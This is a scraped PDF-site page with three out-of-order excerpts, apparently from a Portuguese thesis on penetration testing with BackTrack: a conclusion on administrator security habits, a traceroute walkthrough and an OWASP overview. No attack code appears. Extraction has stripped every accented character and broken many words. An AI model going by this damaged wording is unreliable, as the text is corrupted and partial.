80. ue apesar de n o ter sido o foco deste trabalho existe o constante perigo de um ataque interno para o qual o firewall colocado nos testes n o teria efeito algum Este tema ataques internos poderia ser o foco de um novo estudo Como visto n o existe uma receita nica para manter a seguran a e sim diversas atitudes que devem ser tomadas com frequ ncia por quem controla a rede entre elas estar atento a qualquer mudan a de comportamento em sua rede e servi os verificar sempre arquivos de logs configurar de forma correta os servi os ativos manter o sistema atualizado ter um bom firewall instalado e devidamente configurado ler constantemente os boletins de seguran a do fornecedor se seus softwares s o exemplos de atitudes que sem d vida elevaram o n vel de seguran a da rede Diante do exposto e ap s as an lises realizadas conclui se que conhecer o modus operandi o racioc nio e as ferramentas utilizadas pelos atacantes fundamental para um administrador de rede na prote o de seus ativos Al m disso 65 a Backtrack mostrou ser um recurso importante no auxilio ao administrador da rede em testes de penetra o de seus servidores desde que realizados sob crit rios pr estabelecidos e devidamente monitorados 66 REFERENCIAS BIBLIOGRAFICAS ASSUN O M F A Segredos do Hacker tico 3 ed Florian polis Visual 2010 BACKTRACK Howtos BackTrack Linux Penetration Testing Distribution 2012 Dispon
81. viar um pacote com TTL 1 depois com TTL 2 at chegar a m quina destino faz isso por padr o em 30 hops roteadores e com as respostas obtidas tra a a rota percorrida A figura 1 3 ilustra a sa da de um Traceroute executado no Backtrack 5 LIEIRA 2011 BACKTRACK 2012 Como pode ser observado na figura 1 3 esta consulta foi realizada para saber a rota at o servidor 173 194 74 83 Google e o retorno da consulta omitiu o IP do primeiro roteador que pode estar configurado para n o responder propositalmente entretanto mostrou o endere o do segundo um roteador da Telesp com IP 201 0 86 197 e assim sucessivamente at o d cimo segundo que pode ser visto nesta p gina de consulta existem outros por m esta p gina s mostra os doze primeiros poss vel notar tamb m que al m do endere o IP a ferramenta mostra o tempo de acesso em milissegundos de todos eles e o nome de alguns com isso podemos observar que a consulta partiu de uma rede dsl speedy da telesp e que o oitavo roteador j pertence o alvo pesquisado ou seja o Google Vale lembrar que o traceroute assim como outras ferramentas aqui demonstradas s o largamente utilizadas pelos administradores para monitorar e inventariar sua rede e seus ativos e n o apenas por haker ou craker mal intencionado 21 x root bt File Edit View Terminal Help traceroute to 173 194 74 83 173 194 74 83 30 hops max 60 byte packets a 2 201 0 86 197 dsl telesp net br 201
82. zado para mostrar 38 estatisticamente os riscos ao qual o alvo esta exposto e precisa de cuidados tamb m com base no RVA que sao definidas as estrat gias a serem seguidas no p s teste como por exemplo quanto sera necess rio investir em seguran a quais as prioridades quais solu es de seguran a ser o necess rias e o quanto de melhoria obteremos com estas a es 2 4 OWASP O OWASP ou Projeto Aberto para a Seguran a de Aplica es Web foi fundado em abril de 2004 e segundo a defini o do pr prio documento original OWASP 2008 p 12 uma comunidade aberta dedicada a habilitar as organiza es a desenvolver adquirir e manter aplica es que sejam confi veis Na verdade trata se de uma comunidade onde todo o conte do est dispon vel gratuitamente a quem desejar utiliz lo Como n o tem nenhum v nculo com empresas comerciais do ramo as publica es t m um bom n vel de imparcialidade entretanto estimula o uso informado de tecnologias propriet rias SANTOS 2010 A comunidade OWASP organizada em forma de cap tulos locais cada cap tulo local formado por pessoas da regi o geogr fica que tem interesse em contribuir ativamente ao tema O Brasil tem dois cap tulos um de Bras lia e outro de S o Paulo Devido ao fato de ser uma comunidade o OWASP tem uma das maiores bases de informa es sobre o tema seguran a em aplica es uma vez que possui 21 000 membros 159 cap tulos 117 projetos e
Download Pdf Manuals
Related Search
Related Contents
Samsung ST70 Bruksanvisning Manual de instruções Samsung Samsung B319 User Manual Logo Kaco new energy 4C, 2D_cmyk PDFファイル 取扱説明書 取付・設置説明書 "取扱説明書" FP3000 user manual - Champagne PC Services Copyright © All rights reserved.
Failed to retrieve file